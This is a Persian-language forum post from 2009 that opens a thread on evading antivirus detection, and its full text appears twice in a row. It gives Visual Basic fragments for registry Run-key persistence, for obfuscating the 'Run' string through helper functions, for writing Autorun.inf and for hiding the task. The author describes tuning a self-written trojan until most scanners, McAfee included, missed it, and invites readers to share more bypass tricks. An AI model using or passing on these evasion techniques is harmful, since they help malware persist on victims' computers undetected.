مشاهده نسخه کامل
: MichaelQwerty
25-01-2009, 19:54
سلام دوستان
این بحث را به این دلیل باز کردم تا هر کس هر اطلاعاتی در رابطه با دور زدن و فریب دادن یا روش کار آنتی ویروس ها مطلبی میدونه در اینجا بازگو کنه
نکته :در مورد ازکار انداختن آنتی ویروس ها بحث نکنید لطفا( گناه دارن به خدا)
تجربه خود من در رابطه با دور زدن:
استفاده نکردن از کد هایی که در بیشتر ویروسها استفاده میشه برای مثال:
Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
که زیاد تو ویروس ها از این کد استفاده میشه
می شه به جای این از API استفاده کرد یا شاید یه راه سوم که من نمی دونم؟!
کد کردن مسیر های حساس که در بیشتر ویروس ها به کار میرود مانند:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
امروزه بیشتر ویروس ها از این مسیر در رجیستری برای اجرا شدن در هنگام بالا آمدن ویندوز استفاده می کنند
و بعضی از آنتی ویروس ها به این مسیر حساس هستند و بهترین راه برای فریب دادن کد کردن مسیرهست و به خوبی جواب میده برای مثال: این روش کد گذاری من هست (شما می تونید از یه روش بهتر استفاده کنید) :
Call Reg_SzCreate(Environ("systemroot") + "\System32\explorer.exe", "MS_Windows", "Software\microsoft\windows\currentversion\" + R1("1") + R2("2") + R3("3"), &H80000002)
':::::::::::::::::::::::::::Run Coder::::::::::::::
Private Function R2(r As String) As String
If r = "2" Then R2 = "u"
End Function
Private Function R3(r As String) As String
If r = "3" Then R3 = "n"
End Function
Private Function R1(r As String) As String
If r = "1" Then R1 = "r"
End Function
نکته:این کد ناقص است فقط به کد گذاری مسیر رجیستری توجه کنید
ولی زیاد به آنتی ویروس سخت گرفتم چون اگه به طور کل “Run” می زاشتم داخل یه متغیر باز هم آنتی ویروس جواب نمی داد
عبارتهای دیگری هم هستند که آنتی ویرسها به آنها حساس هستند
مثلا : چند وقت پیش که یه تروجان(ویروس) ساده می نوشتم وقتی کار کاملا تمام شده بود با 38 عدد آنتی ویروس به روز اسکن کردم که چند تا از آنها فایل رو به عنوان فایل مشکوک شناسایی کردن(HEUR/Malware ) و یکیدو تا به عنوان ویروس روش یه اسمی گذاشته بودن بعد از یه کم دستکاری و کد گذاری هنوز دو تا آنتی ویروس از شرکت مکافی
شناسایی میکردن(McAfee+Artemis و McAfee )که بعد از کلی ور رفتن فهمیدم به این عبارت حساس بودن
Print #FileNum, “[AutoRun]”
که مربوط به قسمت فایل Autorun.inf میشد که بعد از کد شدن این خط مکافی هم نتونست شناساییش کنه
یه ورژن از آنتی ویروس پاندا بود که به این کد حساس بود
App.TaskVisible = False
این جور دستوراتو می شه کد کرد؟!فکر نکنم
جالب اینجاست که وقتی به این شکل هم در آوردم باز هم فکر میکرد(آنتی ویروسها که فکر نمی کنند) فایل مشکوکه
Me.Caption = "App.TaskVisible"
حال نوبت شماست!:11:
این بحث را به این دلیل باز کردم تا هر کس هر اطلاعاتی در رابطه با دور زدن و فریب دادن یا روش کار آنتی ویروس ها مطلبی میدونه در اینجا بازگو کنه
نکته :در مورد ازکار انداختن آنتی ویروس ها بحث نکنید لطفا( گناه دارن به خدا)
تجربه خود من در رابطه با دور زدن:
استفاده نکردن از کد هایی که در بیشتر ویروسها استفاده میشه برای مثال:
Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
که زیاد تو ویروس ها از این کد استفاده میشه
می شه به جای این از API استفاده کرد یا شاید یه راه سوم که من نمی دونم؟!
کد کردن مسیر های حساس که در بیشتر ویروس ها به کار میرود مانند:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
امروزه بیشتر ویروس ها از این مسیر در رجیستری برای اجرا شدن در هنگام بالا آمدن ویندوز استفاده می کنند
و بعضی از آنتی ویروس ها به این مسیر حساس هستند و بهترین راه برای فریب دادن کد کردن مسیرهست و به خوبی جواب میده برای مثال: این روش کد گذاری من هست (شما می تونید از یه روش بهتر استفاده کنید) :
Call Reg_SzCreate(Environ("systemroot") + "\System32\explorer.exe", "MS_Windows", "Software\microsoft\windows\currentversion\" + R1("1") + R2("2") + R3("3"), &H80000002)
':::::::::::::::::::::::::::Run Coder::::::::::::::
Private Function R2(r As String) As String
If r = "2" Then R2 = "u"
End Function
Private Function R3(r As String) As String
If r = "3" Then R3 = "n"
End Function
Private Function R1(r As String) As String
If r = "1" Then R1 = "r"
End Function
نکته:این کد ناقص است فقط به کد گذاری مسیر رجیستری توجه کنید
ولی زیاد به آنتی ویروس سخت گرفتم چون اگه به طور کل “Run” می زاشتم داخل یه متغیر باز هم آنتی ویروس جواب نمی داد
عبارتهای دیگری هم هستند که آنتی ویرسها به آنها حساس هستند
مثلا : چند وقت پیش که یه تروجان(ویروس) ساده می نوشتم وقتی کار کاملا تمام شده بود با 38 عدد آنتی ویروس به روز اسکن کردم که چند تا از آنها فایل رو به عنوان فایل مشکوک شناسایی کردن(HEUR/Malware ) و یکیدو تا به عنوان ویروس روش یه اسمی گذاشته بودن بعد از یه کم دستکاری و کد گذاری هنوز دو تا آنتی ویروس از شرکت مکافی
شناسایی میکردن(McAfee+Artemis و McAfee )که بعد از کلی ور رفتن فهمیدم به این عبارت حساس بودن
Print #FileNum, “[AutoRun]”
که مربوط به قسمت فایل Autorun.inf میشد که بعد از کد شدن این خط مکافی هم نتونست شناساییش کنه
یه ورژن از آنتی ویروس پاندا بود که به این کد حساس بود
App.TaskVisible = False
این جور دستوراتو می شه کد کرد؟!فکر نکنم
جالب اینجاست که وقتی به این شکل هم در آوردم باز هم فکر میکرد(آنتی ویروسها که فکر نمی کنند) فایل مشکوکه
Me.Caption = "App.TaskVisible"
حال نوبت شماست!:11: